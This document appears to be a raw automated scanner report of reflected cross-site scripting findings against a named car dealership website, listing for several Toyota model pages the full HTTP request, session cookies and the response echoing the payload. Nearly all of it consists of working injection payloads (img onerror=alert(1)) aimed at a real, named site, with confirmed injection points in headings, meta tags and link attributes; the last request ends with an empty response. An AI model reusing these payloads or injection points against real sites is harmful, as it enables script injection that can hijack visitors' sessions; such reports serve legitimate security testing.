GET /Toyota/Matrix5f8d3<img%20src%3da%20onerror%3dalert(1)>4e65e083804/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:53:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:22 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:53:23 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Matrix5f8d3< ...[SNIP]... <H1> Toyota Matrix5f8d3<img src=a onerror=alert(1)>4e65e083804</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee7f"><img%20src%3da%20onerror%3dalert(1)>3d04ab31bd was submitted in the REST URL parameter 2. This input was echoed as 6ee7f"><img src=a onerror=alert(1)>3d04ab31bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Matrix6ee7f"><img%20src%3da%20onerror%3dalert(1)>3d04ab31bd/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:49:35 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:49:35 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:49:36 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Matrix6ee7f" ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Matrix6ee7f"><img src=a onerror=alert(1)>3d04ab31bd at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Matrix6ee7f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7704d'><img%20src%3da%20onerror%3dalert(1)>98ea0fa9a06 was submitted in the REST URL parameter 2. This input was echoed as 7704d'><img src=a onerror=alert(1)>98ea0fa9a06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Matrix7704d'><img%20src%3da%20onerror%3dalert(1)>98ea0fa9a06/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:51:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:51:57 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:51:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16180
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Matrix7704d' ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Matrix7704d'><img src=a onerror=alert(1)>98ea0fa9a06'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e344'><img%20src%3da%20onerror%3dalert(1)>00dcdd3f07b was submitted in the REST URL parameter 2. This input was echoed as 4e344'><img src=a onerror=alert(1)>00dcdd3f07b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Prius4e344'><img%20src%3da%20onerror%3dalert(1)>00dcdd3f07b/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:37:32 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:37:33 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:37:33 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Prius4e344'> ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Prius4e344'><img src=a onerror=alert(1)>00dcdd3f07b'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88a0e<img%20src%3da%20onerror%3dalert(1)>184fc2908bb was submitted in the REST URL parameter 2. This input was echoed as 88a0e<img src=a onerror=alert(1)>184fc2908bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Prius88a0e<img%20src%3da%20onerror%3dalert(1)>184fc2908bb/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:40:01 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:01 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:40:02 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Prius88a0e<i ...[SNIP]... <H1> Toyota Prius88a0e<img src=a onerror=alert(1)>184fc2908bb</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d1b"><img%20src%3da%20onerror%3dalert(1)>b355657318b was submitted in the REST URL parameter 2. This input was echoed as 16d1b"><img src=a onerror=alert(1)>b355657318b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Prius16d1b"><img%20src%3da%20onerror%3dalert(1)>b355657318b/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:29:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:29:39 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:29:39 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16151
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Prius16d1b"> ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Prius16d1b"><img src=a onerror=alert(1)>b355657318b at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Prius16d1b"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d1e8<img%20src%3da%20onerror%3dalert(1)>72247f1d2e1 was submitted in the REST URL parameter 2. This input was echoed as 5d1e8<img src=a onerror=alert(1)>72247f1d2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/RAV45d1e8<img%20src%3da%20onerror%3dalert(1)>72247f1d2e1/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:57:53 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:57:53 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:57:54 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16111
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota RAV45d1e8<im ...[SNIP]... <H1> Toyota RAV45d1e8<img src=a onerror=alert(1)>72247f1d2e1</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc342"><img%20src%3da%20onerror%3dalert(1)>4d10e890738 was submitted in the REST URL parameter 2. This input was echoed as fc342"><img src=a onerror=alert(1)>4d10e890738 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/RAV4fc342"><img%20src%3da%20onerror%3dalert(1)>4d10e890738/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:54:39 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:54:39 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:54:40 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota RAV4fc342">< ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota RAV4fc342"><img src=a onerror=alert(1)>4d10e890738 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota RAV4fc342"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95961'><img%20src%3da%20onerror%3dalert(1)>4b18651e7d7 was submitted in the REST URL parameter 2. This input was echoed as 95961'><img src=a onerror=alert(1)>4b18651e7d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/RAV495961'><img%20src%3da%20onerror%3dalert(1)>4b18651e7d7/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:56:06 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:56:06 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:56:07 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16159
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota RAV495961'>< ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=RAV495961'><img src=a onerror=alert(1)>4b18651e7d7'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89457<img%20src%3da%20onerror%3dalert(1)>d4aabfa3f2a was submitted in the REST URL parameter 2. This input was echoed as 89457<img src=a onerror=alert(1)>d4aabfa3f2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sequoia89457<img%20src%3da%20onerror%3dalert(1)>d4aabfa3f2a/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:58:05 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:58:05 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:58:06 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16191
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sequoia89457 ...[SNIP]... <H1> Toyota Sequoia89457<img src=a onerror=alert(1)>d4aabfa3f2a</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ab2"><img%20src%3da%20onerror%3dalert(1)>ce78bc2c7e5 was submitted in the REST URL parameter 2. This input was echoed as 68ab2"><img src=a onerror=alert(1)>ce78bc2c7e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sequoia68ab2"><img%20src%3da%20onerror%3dalert(1)>ce78bc2c7e5/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:54:51 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:54:51 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:54:52 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sequoia68ab2 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Sequoia68ab2"><img src=a onerror=alert(1)>ce78bc2c7e5 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Sequoia68ab2"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 622d6'><img%20src%3da%20onerror%3dalert(1)>42209c848b8 was submitted in the REST URL parameter 2. This input was echoed as 622d6'><img src=a onerror=alert(1)>42209c848b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sequoia622d6'><img%20src%3da%20onerror%3dalert(1)>42209c848b8/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:56:26 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:56:27 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:56:27 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16194
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sequoia622d6 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Sequoia622d6'><img src=a onerror=alert(1)>42209c848b8'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a3c"><img%20src%3da%20onerror%3dalert(1)>cfaad35fdec was submitted in the REST URL parameter 2. This input was echoed as 28a3c"><img src=a onerror=alert(1)>cfaad35fdec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sienna28a3c"><img%20src%3da%20onerror%3dalert(1)>cfaad35fdec/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:41:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:41:57 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:41:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sienna28a3c" ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Sienna28a3c"><img src=a onerror=alert(1)>cfaad35fdec at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Sienna28a3c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2618e<img%20src%3da%20onerror%3dalert(1)>9bccc83d676 was submitted in the REST URL parameter 2. This input was echoed as 2618e<img src=a onerror=alert(1)>9bccc83d676 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sienna2618e<img%20src%3da%20onerror%3dalert(1)>9bccc83d676/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:46:42 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:46:42 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:46:43 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16128
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sienna2618e< ...[SNIP]... <H1> Toyota Sienna2618e<img src=a onerror=alert(1)>9bccc83d676</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24cfd'><img%20src%3da%20onerror%3dalert(1)>1643c9e0dd9 was submitted in the REST URL parameter 2. This input was echoed as 24cfd'><img src=a onerror=alert(1)>1643c9e0dd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Sienna24cfd'><img%20src%3da%20onerror%3dalert(1)>1643c9e0dd9/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
